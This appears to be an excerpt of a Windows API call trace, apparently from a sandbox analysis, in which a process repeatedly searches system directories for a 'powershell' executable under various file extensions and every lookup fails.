	[0872.876] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.876] SetErrorMode (uMode=0x1) returned 0x1
	[0872.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.886] SetErrorMode (uMode=0x1) returned 0x1
	[0872.887] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.887] SetErrorMode (uMode=0x1) returned 0x1
	[0872.887] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.896] SetErrorMode (uMode=0x1) returned 0x1
	[0872.898] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.898] SetErrorMode (uMode=0x1) returned 0x1
	[0872.898] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0873.724] SetErrorMode (uMode=0x1) returned 0x1
	[0873.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0873.726] SetErrorMode (uMode=0x1) returned 0x1
	[0873.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.683] SetErrorMode (uMode=0x1) returned 0x1
	[0874.685] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.685] SetErrorMode (uMode=0x1) returned 0x1
	[0874.685] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.699] SetErrorMode (uMode=0x1) returned 0x1
	[0874.701] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0874.701] SetErrorMode (uMode=0x1) returned 0x1
	[0874.701] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0874.710] SetErrorMode (uMode=0x1) returned 0x1
	[0875.321] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.321] SetErrorMode (uMode=0x1) returned 0x1
	[0875.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.333] SetErrorMode (uMode=0x1) returned 0x1
	[0875.334] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.334] SetErrorMode (uMode=0x1) returned 0x1
	[0875.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.342] SetErrorMode (uMode=0x1) returned 0x1
	[0875.344] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.344] SetErrorMode (uMode=0x1) returned 0x1
	[0875.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0875.354] SetErrorMode (uMode=0x1) returned 0x1
	[0875.355] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0875.355] SetErrorMode (uMode=0x1) returned 0x1
	[0875.355] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.127] SetErrorMode (uMode=0x1) returned 0x1
	[0876.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.129] SetErrorMode (uMode=0x1) returned 0x1
	[0876.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.739] SetErrorMode (uMode=0x1) returned 0x1
	[0876.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.740] SetErrorMode (uMode=0x1) returned 0x1
	[0876.740] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.740] SetErrorMode (uMode=0x1) returned 0x1
	[0876.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.740] SetErrorMode (uMode=0x1) returned 0x1
	[0876.741] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.741] SetErrorMode (uMode=0x1) returned 0x1
	[0876.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.741] SetErrorMode (uMode=0x1) returned 0x1
	[0876.741] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.742] SetErrorMode (uMode=0x1) returned 0x1
	[0876.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.742] SetErrorMode (uMode=0x1) returned 0x1
	[0876.742] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.742] SetErrorMode (uMode=0x1) returned 0x1
	[0876.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.743] SetErrorMode (uMode=0x1) returned 0x1
	[0876.743] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.743] SetErrorMode (uMode=0x1) returned 0x1
	[0876.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.743] SetErrorMode (uMode=0x1) returned 0x1
	[0876.743] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.744] SetErrorMode (uMode=0x1) returned 0x1
	[0876.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.744] SetErrorMode (uMode=0x1) returned 0x1
	[0876.744] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.744] SetErrorMode (uMode=0x1) returned 0x1
	[0876.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.745] SetErrorMode (uMode=0x1) returned 0x1
	[0876.745] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.745] SetErrorMode (uMode=0x1) returned 0x1
	[0876.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.745] SetErrorMode (uMode=0x1) returned 0x1
	[0876.746] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.746] SetErrorMode (uMode=0x1) returned 0x1
	[0876.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.746] SetErrorMode (uMode=0x1) returned 0x1
	[0876.746] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.746] SetErrorMode (uMode=0x1) returned 0x1
	[0876.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.747] SetErrorMode (uMode=0x1) returned 0x1
	[0876.747] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.748] SetErrorMode (uMode=0x1) returned 0x1
	[0876.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.749] SetErrorMode (uMode=0x1) returned 0x1
	[0876.749] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.750] SetErrorMode (uMode=0x1) returned 0x1
	[0876.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.750] SetErrorMode (uMode=0x1) returned 0x1
	[0876.750] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.750] SetErrorMode (uMode=0x1) returned 0x1
	[0876.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0876.751] SetErrorMode (uMode=0x1) returned 0x1
	[0876.751] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.751] SetErrorMode (uMode=0x1) returned 0x1
	[0876.752] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.752] SetErrorMode (uMode=0x1) returned 0x1
	[0876.752] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.752] SetErrorMode (uMode=0x1) returned 0x1
	[0876.752] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.752] SetErrorMode (uMode=0x1) returned 0x1
	[0876.752] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.753] SetErrorMode (uMode=0x1) returned 0x1
	[0876.753] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.755] SetErrorMode (uMode=0x1) returned 0x1
	[0876.755] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.755] SetErrorMode (uMode=0x1) returned 0x1
	[0876.756] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.756] SetErrorMode (uMode=0x1) returned 0x1
	[0876.756] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.756] SetErrorMode (uMode=0x1) returned 0x1
	[0876.756] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.756] SetErrorMode (uMode=0x1) returned 0x1
